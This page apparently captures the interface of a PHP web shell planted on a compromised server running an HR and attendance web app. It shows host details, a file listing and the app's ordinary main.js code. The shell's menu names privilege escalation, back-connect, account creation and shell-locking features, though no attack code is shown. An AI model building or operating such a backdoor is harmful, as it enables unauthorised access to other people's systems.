Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.189.143.150
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
oums /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.js.php
3.61
KB
-rw-r--r--
attendance.js
8.79
KB
-rwxr-xr-x
attendance13.09.2020.js
7.5
KB
-rwxr-xr-x
attendance_report.js
16.7
KB
-rwxr-xr-x
control.js
5.43
KB
-rwxr-xr-x
departments.js
11.45
KB
-rwxr-xr-x
documents.js
4.05
KB
-rwxr-xr-x
employees.js
24.3
KB
-rw-rw-r--
employees_arun.js
20.18
KB
-rwxr-xr-x
expense.js
7.21
KB
-rwxr-xr-x
expense_advance.js
4.6
KB
-rwxr-xr-x
expense_advance2.js
4.56
KB
-rw-rw-r--
expense_report.js
10.97
KB
-rwxr-xr-x
expense_report_summary.js
3.52
KB
-rwxr-xr-x
holidays.js
5.67
KB
-rwxr-xr-x
index.js
4.82
KB
-rwxr-xr-x
main.js
9.14
KB
-rwxr-xr-x
mainpage.js
17.48
KB
-rwxr-xr-x
mc_print.js
6.76
KB
-rwxr-xr-x
pg_app_edit.js
25.8
KB
-rwxr-xr-x
salary.js
4.72
KB
-rwxr-xr-x
salary_statement.js
4.21
KB
-rw-rw-r--
send_mail.js
1.27
KB
-rwxr-xr-x
send_sms.js
1.07
KB
-rwxr-xr-x
staff_move.js
6.49
KB
-rwxr-xr-x
task_reminder.js
7.92
KB
-rwxr-xr-x
task_reminder_old.js
4.94
KB
-rwxr-xr-x
task_review.js
5.74
KB
-rwxr-xr-x
task_update.js
5.74
KB
-rwxr-xr-x
upcoming_events.js
13.34
KB
-rw-rw-r--
user_departments.js
2.95
KB
-rwxr-xr-x
user_logs.js
2.63
KB
-rwxr-xr-x
user_password.js
3.97
KB
-rwxr-xr-x
user_rights.js
5.37
KB
-rwxr-xr-x
user_setup.js
6.31
KB
-rwxr-xr-x
work_assign.js
5.41
KB
-rw-rw-r--
work_entry.js
9.21
KB
-rwxr-xr-x
work_entry_org.js
4.26
KB
-rwxr-xr-x
work_entry_report.js
5.33
KB
-rwxr-xr-x
work_review.js
8.67
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : main.js
function getCookie(c_name) { if (document.cookie.length>0) { c_start=document.cookie.indexOf(c_name + "=") if (c_start!=-1) { c_start=c_start + c_name.length+1 c_end=document.cookie.indexOf(";",c_start) if (c_end==-1) c_end=document.cookie.length return unescape(document.cookie.substring(c_start,c_end)) } } return ""; } function logout() { $.ajax({ url:"phpscript/logout.php", type:'POST', success: function() { document.cookie = 'modeid=; expires=Thu, 01 Jan 1970 00:00:01 GMT;'; document.cookie = 'emplid=; expires=Thu, 01 Jan 1970 00:00:01 GMT;'; document.cookie = 'deptid=; expires=Thu, 01 Jan 1970 00:00:01 GMT;'; document.cookie = 'nameid=; expires=Thu, 01 Jan 1970 00:00:01 GMT;'; document.cookie = 'typeid=; expires=Thu, 01 Jan 1970 00:00:01 GMT;'; window.location.href = 'index.html'; } }); } function get_today_date() { var today = new Date(); var dd = today.getDate(); var mm = today.getMonth()+1; //January is 0! var yyyy = today.getFullYear(); if(dd<10){dd='0'+dd} if(mm<10){mm='0'+mm} var today = dd+'-'+mm+'-'+yyyy; return today; } function get_format_date(date) { if(date!='0000-00-00') { var date = new Date(date); var days = date.getDate(); var mnth = date.getMonth()+1; //January is 0! var year = date.getFullYear(); if(days<10){days='0'+days} if(mnth<10){mnth='0'+mnth} var date = days+'-'+mnth+'-'+year; } else { var date = '00'+'-'+'00'+'-'+'0000'; } return date; } function load_page_data(file_name) { file_name=file_name.replace("#","") $.ajax({ type: "POST", url: "phpscript/sys_mainphp.php", data: { load_data:"page_data", file_name:file_name }, cache: false, success: function(data) { var data=JSON.parse(data); $("#page-container-titl").html(data.titl); $("#page-container-link").html(data.lnks); $('#btn_addn').show(); $('#btn_save').hide(); $('#btn_cncl').hide(); } }); } function numbers_only(event) { var key = event.keyCode; if(key == 8 || key == 9 || key == 13) //backspace, tab, enter { return true; } else if(key == 16 || key == 17 || key == 18 || key == 19) //shift, contrl, alt, pause / break { return true; } else if(key == 27) //escape { return true; } else if(key >= 33 && key <= 40) //page up, page down, end, home, left arrow, up arrow, right arrow, down arrow { return true; } else if(key == 46) //delete { return true; } else if(key >= 48 && key <= 57) //numbers { return true; } else if(key >= 96 && key <= 105) //num pad { return true; } else if(key >= 112 && key <= 123) //function { return true; } else { return false; } } function decimals_only(event) { var key = event.keyCode; if(key == 8 || key == 9 || key == 13) //backspace, tab, enter { return true; } else if(key == 16 || key == 17 || key == 18 || key == 19) //shift, contrl, alt, pause / break { return true; } else if(key == 27) //escape { return true; } else if(key >= 33 && key <= 40) //page up, page down, end, home, left arrow, up arrow, right arrow, down arrow { return true; } else if(key == 46) //delete { return true; } else if(key >= 48 && key <= 57) //numbers { return true; } else if(key >= 96 && key <= 105) //num pad { return true; } else if(key == 110) //decimal { return true; } else if(key >= 112 && key <= 123) //function { return true; } else { return false; } } function show_password_change() { $("#user-password-change").load("user_password_change.php",function() { $("#txtusermail").focus(); document.getElementById("txtusermail").value=""; document.getElementById("txtusercode").value=""; } ); $("#user-password-change").css("visibility", "visible"); $("#user-password-change").height($(document).height()); $("#user-password-change").fadeIn("fast"); } function send_password_change() { if (document.getElementById("txtusermail").value=="") { alert("Please enter your mail id!"); txtusermail.focus(); return false; } if (document.getElementById("txtusercode").value=="") { alert("Please enter verification code!"); txtusercode.focus(); return false; } if (document.getElementById("txtusercode").value!=document.getElementById("txtvericode").value) { alert("Invalid verification code!"); txtusercode.focus(); return false; } $("#user-password-change").fadeOut("slow"); } function cncl_password_change() { $("#user-password-change").fadeOut("slow"); } function load_mode_home() { if(getCookie('modeid')) { home_note(); } else { load_mode_page(); } } function load_mode_page() { $("#page-header-mode").load("phpscript/sys_mode.php"); $("#page-header-mode").css("visibility", "visible"); $("#page-header-mode").height($(document).height()); $("#page-header-mode").fadeIn("fast"); } function cncl_mode_page() { $("#page-header-mode").fadeOut("slow"); } function sele_mode_page(mode_code) { document.cookie = "modeid="+mode_code; $("#page-header-mode").fadeOut("fast"); window.location.href = 'mainpage.php'; } function show_process() { $("#page-process").css("visibility", "visible"); $("#page-process").height($(document).height()); $("#page-process").fadeIn("slow"); } function hide_process() { $("#page-process").css("visibility", "hidden"); $("#page-process").height(0); $("#page-process").fadeOut("slow"); } function home_attn() { $.ajax({ type: "POST", url: "phpscript/home_attendance.php", cache: false, beforeSend: function() { show_process(); }, success: function(data) { $("#home-content-head").html("Attendance"); $("#home-content-note").html(data); hide_process(); } }); } function home_expn() { $.ajax({ type: "POST", url: "phpscript/home_expenses.php", cache: false, beforeSend: function() { show_process(); }, success: function(data) { $("#home-content-head").html("Expenses"); $("#home-content-note").html(data); hide_process(); } }); } function home_remn() { $.ajax({ type: "POST", url: "phpscript/home_events.php", cache: false, beforeSend: function() { show_process(); }, success: function(data) { $("#home-content-head").html("Event Reminders"); $("#home-content-note").html(data); hide_process(); } }); } function home_salr() { $.ajax({ type: "POST", url: "phpscript/home_salary.php", cache: false, beforeSend: function() { show_process(); }, success: function(data) { $("#home-content-head").html("Salary"); $("#home-content-note").html(data); hide_process(); } }); } function home_task() { $.ajax({ type: "POST", url: "phpscript/home_task.php", cache: false, beforeSend: function() { show_process(); }, success: function(data) { $("#home-content-head").html("Task Reminder"); $("#home-content-note").html(data); hide_process(); } }); } function home_work() { $.ajax({ type: "POST", url: "phpscript/home_work.php", cache: false, beforeSend: function() { show_process(); }, success: function(data) { $("#home-content-head").html("Daily Work Status"); $("#home-content-note").html(data); hide_process(); } }); } function home_move() { $.ajax({ type: "POST", url: "phpscript/home_movements.php", cache: false, beforeSend: function() { show_process(); }, success: function(data) { $("#home-content-head").html("Staff Movement"); $("#home-content-note").html(data); hide_process(); } }); } function home_appr() { $.ajax({ type: "POST", url: "phpscript/home_appraisals.php", cache: false, beforeSend: function() { show_process(); }, success: function(data) { $("#home-content-head").html("Staff Appraisals"); $("#home-content-note").html(data); hide_process(); } }); } function home_note() { $.ajax({ type: "POST", url: "phpscript/home_note.php", dataType:"json", cache: false, beforeSend: function() { show_process(); }, success: function(data) { $("#headattn").html(data.attn); $("#headexpn").html(data.expn); $("#headtask").html(data.task); $("#headwork").html(data.work); $("#headmove").html(data.move); $("#headappr").html(data.appr); $("#headsalr").html(data.salr); $("#headremn").html(data.bday); $("#homeattn").html(data.attn); $("#homeexpn").html(data.expn); $("#hometask").html(data.task); $("#homework").html(data.work); $("#homemove").html(data.move); $("#homeappr").html(data.appr); $("#homesalr").html(data.salr); $("#homeremn").html(data.bday); home_attn(); }, error: function(data) { $("#home-content-note").html("Error: "+data); } }); } function status_report() { $.ajax({ type: "POST", url: "phpscript/status_report.php", //dataType:"json", cache: false, beforeSend: function() { show_process(); }, success: function(data) { hide_process(); if(data.stat!='F') { //window.location.href="phpscript/"+data.file; } //$("#home-content-note").html(data); }, error: function(data) { hide_process(); $("#home-content-note").html("Error: "+data); } }); }
Close